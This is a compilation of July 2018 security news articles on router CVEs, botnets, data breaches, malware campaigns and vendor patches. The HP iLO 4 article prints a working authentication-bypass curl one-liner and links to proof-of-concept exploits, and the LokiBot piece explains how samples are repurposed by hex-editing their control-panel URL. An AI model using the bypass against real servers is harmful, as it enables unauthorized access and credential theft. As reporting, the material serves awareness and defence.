Critical flaws patched in ISP Advanced Digital Broadcast Broadband devices

11.7.2018 securityaffairs Vulnerebility

Advanced Digital Broadcast has rolled out security patched to fix three critical vulnerabilities in Its Broadband gear.
Advanced Digital Broadcast has released patches for three critical vulnerabilities affecting broadband gateways. All the ADB Broadband Gateways and Routers based on Epicentro platform are affected by the vulnerabilities.

The flaws were discovered nearly two years ago, they are a privilege escalation bug, an authorization bypass issue, and a local jailbreak bug.

The Advanced Digital Broadcast manufactures routers and network devices dozens of broadband and telco firms.

The vulnerabilities were first discovered in June 2016 by experts at SEC Consult Vulnerability Lab.

The company started rolling out the patches in July 2017.

Advanced Digital Broadcast

Let’s see in detail the three flaws:

The CVE-2018-13108 flaw is a local root jailbreak flaw that can be exploited leveraging a network file sharing vulnerability.
“By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges,” according to researchers. “Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys.”

Experts explained that the “network file sharing” feature of ADB broadband devices via USB leverages a Samba daemon to access be USB devices. The access has the highest access rights and exports the network shares with root user permissions. Attackers can abuse the Samba daemon that runs in the background to access the USB port.

The CVE-2018-13109 authorization bypass vulnerability that affects some versions of firmware used in ADB broadband devices. The flaw could be exploited by an attacker to gain access to the device settings within the web interface otherwise forbidden to the user.
“By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP.” researchers wrote. “It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP.”

The CVE-2018-13110 privilege escalation vulnerability via Linux group manipulation that could be exploited by an attacker to gain access to the command line interface (CLI) of the device, even if the CLI was previously disabled by the ISP.
“By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP.” researchers wrote.

“Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights.”

ADB has released an updated firmware that addresses the flaws.


HNS Botnet evolves and targets cross-platform database solutions
11.7.2018 securityaffairs BotNet

The HNS IoT botnet (Hide and Seek) originally discovered by BitDefender in January evolves and now targets cross-platform database solutions.
Do you remember the Hide ‘N Seek (HNS) botnet?

The IoT botnet Hide ‘N Seek botnet appeared in the threat landscape in January, when it was first spotted on January 10th by malware researchers from Bitdefender. It was first discovered on January 10, then it disappeared for a few days, and appeared again a few weeks later infecting in less than a weeks more than 20,000 devices.

HNS botnet

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

HNS botnet looks for systems to infect by scanning the Internet for fixed TCP port 80/8080/2480/5984/23 and other random ports. The HNS botnet borrows code from Mirai botnet.

HNS botnet scanning.png

The Hide ‘N Seek is now targeting also cross-platform database solutions, it is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.

“2P-like botnets are hard to take down, and the HNS botnet has been continuously updated over the past few months,” reads the analysis published by Netlab Qihoo 360 researchers.

“some major updates we see:

Added exploits for AVTECH devices (webcam, webcam), CISCO Linksys router, JAWS/1.0 web server, Apache CouchDB, OrientDB; with the two devices mentioned in the original report, HNS currently supports 7 exploiting methods all together
Hard-coded P2P node addresses have been increased to 171;
In addition, we observed that the HNS botnet adds a cpuminer mining program, it is not functioning properly yet.
In particular, with the added support of OrientDB and CouchDB database servers, HNS is no longer just an IoT botnet, but a cross-platform botnet now.”
According to Netlab, the Hide ‘N Seek (HNS) botnet now targets the following types of devices using the following exploits:
TPLink-Routers RCE
Netgear RCE
(new) AVTECH RCE
(new) CISCO Linksys Router RCE
(new) JAW/1.0 RCE
(new) OrientDB RCE
(new) CouchDB RCE
Experts pointed out that the HNS has also started dropping a miner payload, but the good news is that it is not functioning properly yet.

Further technical details on the Hide ‘N Seek botnet, including the IoCs, are reported in the analysis published by the Netlab team.


Smart Speaker Banking Is Coming to a Device Near You, But Is It Secure?
11.7.2018 securityaffairs
Virus

Smart speaker Banking Is coming to a device near you, Which are the cyber risks associated with their use? Are they a new opportunity for attackers?
The popularity of voice-activated smart speakers like the Google Home and Amazon Echo has made brands, and industries realize there’s adequate demand for introducing technology that lets people accomplish things just by speaking.

They can order items, check traffic in their areas and search for information, among other conveniences.

Soon, smart speaker owners can take care of their banking needs. Should you consider taking that approach, too?

Check Balances and Pay Credit Card Bills
Regional brand U.S. Bank is the first establishment in the financial industry to unveil online banking opportunities that work with all three virtual assistants — Alexa, Google Assistant and Siri — making it relevant to a significant segment of the market.

After a soft launch, U.S. Bank started marketing the option to its customers in June 2018. For now, customers can check their account balances and make credit card or mortgage payments. The brand is also reportedly considering letting people transfer money to other account holders.

Also, smaller banks and credit unions offer similar functionality. Capital One and American Express let people pay bills through their smart speakers, too.

Smart Speakers Could Reveal Private Details
Most skills for the Amazon Echo that emphasize productivity give audible information to users. The idea is that they can do things without fumbling with their phones or otherwise using their hands.

The banking apps that work with Amazon and Google smart speakers give information through spoken responses to verbal prompts.

In contrast, people using Apple’s Siri assistant can do some banking tasks with iOS apps that support Siri, but they only see their information displayed on screens. Banking skills are not available on Apple’s HomePod speaker yet, and the company hasn’t divulged if they’re on the horizon.

Imagine the privacy concerns if you use a smart speaker banking app, and it lets your mother-in-law — who’s temporarily living with you — know how much money is in your account because she overhears the speaker’s reply to your prompt?

That’s an example of how a feature that’s supposed to be convenient could instead broadcast sensitive details to others who are nearby.

Users Must Set Up PINs
The banks that provide information to smart speaker owners require people to set up four-digit PINs and recommend that they be different than the individuals’ ATM PINs. As there are with passwords, there are recommended ways to pick a good PIN, too. However, not everyone follows these. Many take the risk of prioritizing handiness over security by setting up passwords that are easy to remember — but equally as easy for others to guess.

Also, although the Google Assistant and Amazon’s Alexa support individual voice recognition, U.S. Bank hasn’t enabled that feature on the platform yet. Security analysts point out that even with voice recognition technology in place, hackers could still record a person speaking and play it back for the speaker to detect later.

And the PINs people enter at ATMs aren’t as secure as many people think. Criminals can use hidden cameras or false keypads to capture PINs as people put them into the machines.

Research also found the motion-sensitive components of smartwatches could capture PIN data, then allow hackers to figure out what numbers they enter with up to 80 percent accuracy on the first attempt.

You can probably envision a scenario where a determined hacker devises a plan to hear a person’s spoken PIN sent to a smart speaker, too.

For example, maybe a smart speaker owner is in the habit of using such a device that’s on a nightstand a few feet away from a window to check a bank account balance each morning. If someone realizes that individual often keeps that window open in hot weather and learns their banking routine, they could wait outside the window to hear the details.

Smart Speaker
Image by Rahul Chakraborty

The Potential for Misunderstood Transfer Requests
If you eventually have the option to transfer money with a smart speaker, that option may not be failsafe, either, especially if you have to utter the person’s name to confirm your request.

Smart speakers have highly sensitive microphones, but they still don’t pick up on everything correctly. In one case, a toddler said “Alexa, play Digger Digger,” and an Amazon Echo Dot started providing pornographic content while adults in the background frantically told it to stop.

What if a smart speaker misinterprets either the name of the person who should receive your money or the amount you want to send? In either case, you could find yourself dealing with a tricky situation that’s difficult to rectify.

Hackers Always Find Ways to Orchestrate Attacks
As with anything else, it’s crucial to weigh the pros and cons. Sure, it might be great to pay your credit card bill with only a vocal command, but are you willing to let a potentially vulnerable smart speaker possess some of your most lucrative information?

Because the possibility of banking with your smart speaker is still so new, speculation primarily informs musings about the security risks that convenience could bring. If smart speaker banking becomes a mainstream practice, hackers will undoubtedly intensify their efforts to break into the speakers and get details that could compromise victims’ financial situations.

About the Author:

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.


Hacker hijacked original LokiBot malware to sell samples in the wild
11.7.2018 securityaffairs
Virus

An expert found evidences that demonstrate the current distributed LokiBot malware samples were “hijacked” by a third actor.
According to the researcher who goes online by the Twitter handle “d00rt,” samples of the LokiBot malware samples being distributed in the wild are modified versions of the original sample.

d00rt
@D00RT_RM
I just released an article where are evidences that demonstrate the current distributed #LokiBot infostealer samples were "hijacked" by a third actor. In the repository there are Scripts for extracting the static config and code for disinfecting. https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf …

10:25 AM - Jul 6, 2018

d00rt/hijacked_lokibot_version
Contribute to hijacked_lokibot_version development by creating an account on GitHub.

github.com
89
84 people are talking about this
Twitter Ads info and privacy
The Lokibot malware has been active since 2015, it is an infostealer that was involved in many malspam campaigns aimed at harvest credentials from web browsers, email clients, admin tools and that was also used to target cryptocoin-wallet owners.
The original LokiBot malware was developed and sold by online by a hacker who goes online by the alias “lokistov,” (aks Carter).

The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.

According to d00rt there is an explanation for such kind of proliferation online, a threat actor may have “hijacked” the original malware, and even without having a direct access to the original source code he was able to offer other hackers the possibility to set up their own domains for receiving the stolen data.

The expert reversed many pieces of malware and found five references to the C&C server, four of them are encrypted using Triple DES algorithm and one using a simple XOR cipher.

The malware uses the function “Decrypt3DESstring” to decrypt the encrypted strings and get the URL of the command-and-control server.

According to the expert, the Decrypt3DESstring found in the sample he analyzed is different from the ones available in previous variants of the LokiBot malware

The new Decrypt3DESstring function discovered in new samples always return value from the XOR-protected string, instead of Triple DES strings.

“The 3DES protected URLs are always the same in the all of the LokiBot samples of this version,” the researcher wrote.

“Therefore, those URLs are never used. Decrypt3DESstring returns a 3DES decrypted buffer. This should be the ideal behavior of this function, but as was described before, each time Decrypt3DESstring is called, it returns a decrypted url with XOR or encrypted url with XOR.”

Lokibot malware

The expert explained that anyone with a new sample of LokiBot could use a simple HEX editor to modify the program and add its custom URLs for receiving the stolen data.

“The newest (or the most extended) LokiBot samples are patched. There is a new section called “x” where is a xored url. That url is the control panel url. Keeping that in mind, it would be very easy to create a builder, for creating LokiBot samples with a new control panel and sell it. You could change the xored url with another xored url using a hex editor or with a simple script.” continues the analysis published by the expert.

“There exist a builder in the underground forums which is able to create new
LokiBot samples with a custom control panel. As I explained before, this builder
encrypts the control panel with xor an writes it in the “x” section.

d00rt discovered several LokiBot samples available for sale on the underground market that were patched by using a builder available in the underground forums.

The author of LokiBot malware, meantime, has launched the new version 2.0 and he is offering it on many forums.

The decryption function was also being used to get registry values required for making the malware persistent on a system, but since after patching the decryption function only returns a URL, the new LokiBot samples fails to restart after the device reboots.

The expert also discovered that the modification introduced to patch the malware introduces a couple of bugs in malicious code.

Some strings of LokiBot malware are encrypted and the malware uses the function Decrypt3DESstring to decrypt them. After patching this function, it always returns the same string that is the XORed url which is located at “x” section.

“The following is the registry key name used in persistence:
Software\Microsoft\Windows\CurrentVersion\Run
This registry key is encrypted using 3DES algorithm. When the patched LokiBot tries to get persistence, it uses Decrypt3DESstring to decrypt the registry key name. But because that function is patched, the returned string is the url at “x” section, instead of the registry key.

Further technical details for the threat are reported in the research paper published by the expert on GitHub.


Timehop data breach, data from 21 million users exposed
11.7.2018 securityaffairs Incindent

Timehop, the service that aims to help people in finding new ways to connect with each other by analyzing past activities, has been hacked.
Timehop is a service that aims to help people in finding new ways to connect with each other by analyzing past activities.

“Timehop created the digital nostalgia category and continues to be THE team reinventing reminiscing for the digital era. We have more “old” photos and content than ever before, yet most of the internet focuses on “new”.” reads its website.

The Timehop service leverages posts from many social networks to build its own memory and use it to create new connections, but something went wrong.

The company admitted that data describing 21 million members may have been exposed.

Unknown attackers breached into its systems, the company discovered the intrusion while the hackers were exfiltrating the data.

“On July 4, 2018, Timehop experienced a network intrusion that led to a breach of some of your data. We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. While our investigation into this incident (and the possibility of any earlier ones that may have occurred) continues, we are writing to provide our users and partners with all the relevant information as quickly as possible.” reads the data breach notification published by the company.

Stolen data includes names, email addresses, and some phone numbers, while no private/direct messages, financial data, or social media or photo content, or Timehop data including streaks were exposed.

The company pointed out that none of the users’ “memories,” – the social media posts & photos that Timehop stores, were accessed by the attackers.

The company admitted that hackers obtained access credential to its cloud computing environment, that incredibly was not protected by multifactor authentication.

The security team locked out the attackers two hours and nineteen minutes later its discovery.

The attackers also accessed the keys that let Timehop read and show you your social media posts (but not private messages), in response to the incident the IT staff at the company has deactivated them, this means that users will have to re-authenticate to their App.

timehop

The bad news is that the security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. Timehop tried to downplay the problem explaining that the tokens have been quickly revoked and currently don’t work.

“Second, we want to be clear that these tokens do not give anyone (including Timehop) access to Facebook Messenger, or Direct Messages on Twitter or Instagram, or things that your friends post to your Facebook wall. In general, Timehop only has access to social media posts you post yourself to your profile.” continues the company’s notification.“However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts – again, we have no evidence that this actually happened.“

Timehop is warning its users that provided a phone number for the authentication of taking additional security precautions with their cellular provider to ensure that their number cannot be ported.

The company now has taken steps to improve the security of its architecture, including the adoption of multifactor authentication to secure our authorization and access controls on all accounts.

Technical details about the incident have been published in this post.


HP iLO servers running outdated firmware could be remotely hacked
11.7.2018 securityaffairs Hacking

Hewlett Packard Integrated Lights-Out 4 (HP iLO 4) servers are affected by a critical Bypass Authentication vulnerability, technical details and a PoC code have been published online.
The flaw, tracked as CVE-2017-12542, received a severity score of 9.8 out of 10 because it is very simple to exploit.

“Integrated Lights-Out, or iLO, is a proprietary embedded server management technology by Hewlett-Packard which provides out-of-band management facilities. The physical connection is an Ethernet port that can be found on most Proliant servers and microservers of the 300 and above series.” reads Wikipedia.

iLO cards allow administrators to perform a broad range of management activities in a company network, including to install firmware remotely and provide access to a remote console.

The flaw was discovered by three security researchers (Fabien Périgaud from Synacktiv, Alexandre Gazet from Airbus, and the independent security researcher Joffrey Czarny) last year and potentially expose any iLO servers exposed online at risk.

The flaw could be exploited by a remote authenticated attack to access to HP iLO consoles, extract cleartext passwords, execute malware, and even replace iLO firmware.

The experts discovered that it is possible to exploit issue by using a cURL request and 29 letter “A” characters:

curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
In the following images, the experts demonstrate how to bypass iLO authentication, in this case how to retrieve a local user’s password in cleartext.

The good news is that HP addressed the flaw in August 2017 with the release of the iLO 4 firmware version 2.54, for this reason, system administrators need to upgrade their servers.

The flaw affects HP iLO 4 servers running firmware version prior to 2.53.

The experts presented their findings at some security conferences, including the ReCon Brussels (Slides, research paper ) and SSTIC 2018.

The PoC exploits for the flaw are available at the following URLs:

https://www.exploit-db.com/exploits/44005/
https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py
A Metasploit module for the flaw is available here.


GoDaddy-owned hosting company Domainfactory hacked
11.7.2018 securityaffairs Hacking

The hosting company Domainfactory has taken down its forums after hackers posted messages claiming to have breached into its infrastructure.
While I was writing about the Timehope security breach, another incident is making the headlines, the victim is the German hosting company Domainfactory.

The hosting company, that was owned by GoDaddy since 2016, has taken down its forums after hackers posted messages informing visitors that they have breached into the Domainfactory infrastructure.

DomainFactory hacked 3.jpeg
Source Heise.de

The company notified the data breach to the customers and asked them to change their passwords.

“On July 3, 2018, a person in the DomainFactory forum claimed access to DomainFactory customer data. We initiated a detailed investigation and found that customer data was accessed by an outside party without authorization. The access route is now secured.” wrote a company representative.

“We contact all customers with the recommendation to update their DomainFactory passwords. Instructions for changing your passwords can be found here:
https://www.df.eu/blog/pw/

We have notified the data protection authority and commissioned external experts with the investigation. The protection of the data of our customers is paramount and we regret the inconvenience this incident causes, very much.”

The company notified the data protection authorities and is investigating the hack with the help of external experts.

The Domainfactory staff first learned of the incident in the early evening of July 3, 2018, the security team dated the data breach as January 28, 2018.

A first investigation confirmed that unauthorized third parties could have had access to the several categories of data, including customer name, company name, customer number, address, E-mail addresses, phone number, DomainFactory phone password, date of birth, bank name and account number (eg IBAN or BIC), and Schufa score.

In response to the attack, the company secured the breached systems.

The hack was disclosed by the German media outlet Heise, that noticed the strange messages of the hackers published on the forums.

The German journalist Fabian Scherschel also posted on Twitter (in German) that he noticed a thread, before public disclosure of the incident, “in which Lauter #Domainfactory customers ask a hacker about their data because DF does not respond to their requests”

Fabian A. Scherschel
@fabsh
Ich sitze hier in nem Twitter-Thread in dem lauter #Domainfactory-Kunden einen Hacker nach ihren Daten fragen, weil DF nicht auf ihre Anfragen reagiert. Ist das jetzt schon #PostDSGVO? 😅

Hintergrund: https://heise.de/-4104495

5:16 PM - Jul 7, 2018

Datenleck bei Domainfactory: Kunden sollen Passwörter ändern
Nachdem weitere Details zum Angriff auf Domainfactory bekannt wurden, bittet der Hoster alle seine Kunden, ihre Passwörter zu ändern.

heise.de
57
29 people are talking about this
Twitter Ads info and privacy
According to the Heise, hackers exploited a variant of the Dirty Cow flaw to breach into the systems.


Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.2018 securityaffairs BigBrothers

The Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involved Fitness application and military. this time the Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.

This is the second incident in a few months, in January experts discovered that military worldwide have publicly shared online their exercise routes recorded through the fitness tracker Strava revealing the fitness sessions conducted inside or near military bases.

During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.

According to an investigation by the news website Bellingcat and the Dutch news agency De Correspondent, the fitness devices were leaking data belonging to the military or intelligence officials who could be exploited by a threat actors to spy on them.

“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma that investigated the case with the Dutch news outlet De Correspondent.

“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”

Polar

The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.

The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.

“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch solider’s personal information.” reads the blog post published by Defensenews.com.

“They found the name of the solider, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”

In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.

The company has already implemented a number of measures to mitigate the exposure of its users along with the suspension for the Flow Explore feature until further notice.

The location tracking feature allows thousands of athletes daily all over the world to share and data related to their training sessions.

“If there hasn’t been a data breach, why have you suspended the Explore feature?

While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.

“I have seen statements that suggest that Polar leaked data – Did Polar leak any data?Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”

De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were able to collect sensitive data from military or civilian personnel.

“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.


BlackTech APT using stolen D-Link certificates to spread malware
11.7.2018 securityaffairs APT

A cyber-espionage group tracked as BlackTech is abusing code-signing certificates stolen from D-Link for the distribution of their malware.
Security experts from ESET discovered that an APT group tracked as BlackTech is using code-signing certificates stolen from Taiwanese-based tech firm D-Link and the security company Changing Information Technology Inc.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

The attackers used the certificates to sign the code of the Plead backdoor that has been in the wild since at least 2012.

The Plead backdoor was used by threat actors to exfiltrate confidential documents from Taiwanese government agencies and private organizations.

“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate.” reads the analysis published by ESET.

“The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen.”

BlackTech APT

ESET reported the abuses to the D-Link that revoked two certificates on July 3 and informed its customers that most of them should not be affected by the revocation.

“D-Link recently discovered that two of its code signing certificates were misappropriated. Upon discovery, we immediately decommissioned the certificates and investigated the issue.” reads the advisory published by D-Link.

“Like several other companies in Asia, D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong. The two affected D-Link certificates were revoked, effective July 3rd, 2018. New certificates have been issued to resolve this problem.”

Taiwan-based Changing Information Technology Inc. revoked the abused certificate on July 4, but according to ESET, the hackers continued to use it to spread the malware.

ESET identified two different malware families that were abusing the stolen certificate, the Plead backdoor, and a related password stealer component that could gather saved passwords from Google Chrome, Microsoft Internet Explorer, Microsoft Outlook, and Mozilla Firefox.

The signed Plead backdoor are highly obfuscated with junk code, it was used to download from a remote server or opens from the local disk a small encrypted binary blob. This blob includes an encrypted shellcode that downloads the final Plead backdoor module.

Why do the attackers steal digital certificates?

Attackers use to sign the malicious code with digital certificates in the attempt to make the malware appearing like legitimate applications bypassing security measures.

The most popular case of a malware abusing code-signing certificates was the Stuxnet worm, that misused digital certificates stolen from RealTek and JMicron.


Just using a $39 device it is possible to defeat new iOS USB Restricted Mode
11.7.2018 securityaffairs Apple

Once USB Restricted Mode is enabled on a device, no data communications occur over the Lightning port, but experts found a way to reset the countdown timer.
Recently Apple released the iOS 11.4.1 that introduced a new security feature, dubbed USB Restricted Mode, designed to protect your devices against USB accessories used by forensics experts and law enforcement agencies to analyze iPhone or iPad.

The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.

Forensics hardware like the ones manufactured by Cellebrite and Grayshift firm will not be able to attempt brute-force attacks via the Lightning port.

Apple USB Restricted Mode feature

While Apple proudly announced its new feature, experts from ElcomSoft have found a way to reset the countdown timer of USB Restricted Mode and bypass the defense mechanism.

The researchers discovered that by directly connecting a USB accessory to the iOS device within an hour after it was last unlocked would reset the 1-hour countdown.

A cheap Apple’s $39 Lightning to USB 3 Camera adapter could be used to bypass the security features, the experts also discovered that it is possible to bypass the USB Restricted Mode by using untrusted Lightning accessories, or those that have not been paired with the iPhone before.

“What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all).” reads the post published by ElcomSoft.

“In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.”

USB Restricted Mode

ElcomSoft researchers are also testing an unofficial and cheap Lightning to USB adapters to bypass the security measure.

According to the experts, the issue could be easily fixed by Apple, it is probably nothing more than an oversight.

The new feature can be enabled from Settings > Face ID (or Touch ID) & Passcode > USB Accessories, by leaving the toggle disabled.

In case you need to immediately activate the feature on the iOS device before the countdown timer ends, just press the Power button five times.


Adobe July Patch Tuesday fixes over 100 flaws in Adobe Acrobat and Reader
11.7.2018 securityaffairs
Vulnerebility

Adobe released July Patch Tuesday security updates that address over 100 flaws in Acrobat and Reader, and other issues in Flash Player, Experience Manager, and Connect.
Adobe on Tuesday has released July Patch Tuesday security updates that addressed more than 100 flaws in its products, including 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.

Windows and macOS versions of Adobe Acrobat and Reader were affected by tens of critical memory corruption bugs that could be exploited by an attacker for remote code execution. The list of flaws includes double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error vulnerabilities.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The July Patch Tuesday security updates also addressed a critical privilege escalation and tens of important out-of-bounds read vulnerabilities.

Many flaws fixed by Adobe were reported to the company through the Trend Micro’s Zero-Day Initiative (ZDI).

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 30.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe for Flash Player.

Adobe addressed three server-side request forgery (SSRF) vulnerabilities in Experience Manager that can lead to the exposure of sensitive information, fix authentication bypass and insecure library loading flaws in Adobe Connect. None of the flaws in Experience Manager and Adobe Connect was rated as critical.

The good news for the Adobe customers is that the company is not aware of any attack in the wild that exploited one of the flaws addressed with the July Patch Tuesday security updates.


Trojan Either Encrypts Files or Mines for Cryptocurrency
7.7.2018 securityweek Cryptocurrency

A long established ransomware family recently added the ability to deploy a cryptocurrency miner instead of file encryptor, based on the victim machine’s configuration.

The malware, which Kaspersky Lab detects as Rakhni, was first discovered in 2013 and has received numerous updates ever since. The latest feature added to the threat, however, makes it stand out from the crowd: the malware’s downloader checks the victim system and decides whether to infect it with a cryptor or a miner.

Mainly affecting users in Russia but spread worldwide, the Trojan is being distributed via spam emails with a malicious Word document attached. The file has an embedded PDF document that, once opened, launches a malicious downloader and also displays a fake error message to the victim.

The malware poses as software from Adobe, and even uses a fake digital signature featuring the name Adobe Systems Incorporated.

Once executed, it performs a series of checks to determine if it runs in a virtualized environment or if it is being analyzed, creates a registry key, and checks the process count, computer name, and IP address. The downloader also checks registry keys for specific strings associated with virtual machines, sandbox and analysis tools.

After completing this exhaustive list of checks (over 200), the threat proceeds to install a root certificate from its resources. The malware also checks for anti-virus programs on the system and can disable Windows Defender if no other AV process is found.

The downloader checks if the folder %AppData%\Bitcoin is present on the machine and drops the cryptor if it exists. If not, and there are more than two logical processors, the miner is dropped. If the folder doesn’t exist and there’s only one logical processor, the malware jumps to a worm component.

The cryptor performs its own set of checks on the machine, targets over 60 processes for termination, and only starts the encryption process if the system has been idle for 2 minutes. The malware targets nearly 200 file types for encryption, uses the RSA-1024 encryption algorithm, and appends the .neitrino to the affected files.

The miner generates a VBS script that gets launched after the system reboots, and which contains two commands to mine for Monero and Monero Original, respectively. Then, if the installation directory also contains the svchost.exe file, the malware launches it to mine for Dashcoin. A fake Microsoft certificate is used to hide the malicious process on the system.

“When this analysis was carried out, the downloader was receiving an archive with a miner that didn’t use the GPU. The attacker uses the console version of the MinerGate utility for mining,” Kaspersky explains.

The malware was also observed sending emails to a hardcoded address, to provide attackers with information such as computer name, IP address, malware’s path on the system, data and time, and malware build date, in addition to providing details on the infection itself.

The downloader was also observed attempting to spread to other computers on the local network. For that, it gets a list of network shares and then checks each computer to see if the folder Users is shared, in an attempt to copy itself to the Startup folder of each accessible user.

The malware also creates a batch file to delete all ‘temporary’ files used during infection, a rather common behavior.


Google July 2018 Android patches fixes critical vulnerabilities
7.7.2018 securityaffairs Android

This week Google released the July 2018 Android patches that address tens of vulnerabilities in the popular mobile operating system.
Google released the July 2018 Android patches that address a total of 11 vulnerabilities, including three Critical issues and 8 High-risk flaws that affect the framework, media framework, and system.

The critical vulnerabilities are remote code execution issues, the other flaws include information disclosure bugs, denial of service and elevation of privilege issues.

The most severe vulnerability affecting the Framework (CVE-2018-9433) could be exploited by a remote attacker using a specially crafted pac file to execute arbitrary code within the context of a privileged process.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” reads the security advisory.

The most severe vulnerability in System (CVE-2018-9365) component could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

The most severe vulnerability in the Media framework component (CVE-2018-9411) could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

Affected Android versions are Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

July 2018 Android patches

Google also addressed a total of 32 vulnerabilities as part of the 2018-07-05 security patch level, 8 critical issues and 24 rated as High risk.

These vulnerabilities affect the Kernel (4 elevation of privilege bugs), Qualcomm (6, 1 Critical RCE flaw, one High severity RCE, 2 High-risk information High-risk issues, and 2 elevation of privilege vulnerabilities), and Qualcomm closed-source (22, 7 Critical issues and 15 High risk flaws) components.


New Rakhni variant could infect systems with either a ransomware or a miner
7.7.2018 securityaffairs
Ransomware

Security researchers at Kaspersky Labs have discovered a new strain of the Rakhni malware that could infect systems with either a ransomware or a cryptocurrency miner.
Experts from Kaspersky Labs have discovered a new strain of the Rakhni ransomware family that could infect systems with either a ransomware or a cryptocurrency miner depending upon their configurations.

“Way back in 2013 our malware analysts spotted the first malicious samples related to the Trojan-Ransom.Win32.Rakhni family.” reads the analysis published by Kaspersky.

“Now the criminals have decided to add a new feature to their creation – a mining capability. In this article we describe a downloader that decides how to infect the victim: with a cryptor or with a miner.”

Rakhni ransomware family

The Rakhni malware is being spread via spear-phishing messages that have weaponized MS word file in the attachment.

Once the victims opened the document, it will prompt them to save the document and enable editing. The document contains a PDF icon that if clicked will launch a malicious executable and immediately displays a fake error message box upon execution.

The message informs the victim that it is impossible to open the PDF file because a system file is missing.

In the background, the Rakhni malware makes anti-VM and anti-sandbox checks to determine if it is possible to infect the system. If the malware determines that it is possible to infect the system, it performs more checks to decide if deliver a ransomware or cryptocurrency miner.

“The decision to download the cryptor or the miner depends on the presence of the folder %AppData%\Bitcoin. If the folder exists, the downloader decides to download the cryptor.” continues the analysis.
“If the folder doesn’t exist and the machine has more than two logical processors, the miner will be downloaded. If there’s no folder and just one logical processor, the downloader jumps to its worm component, which is described below in the corresponding part of the article.”
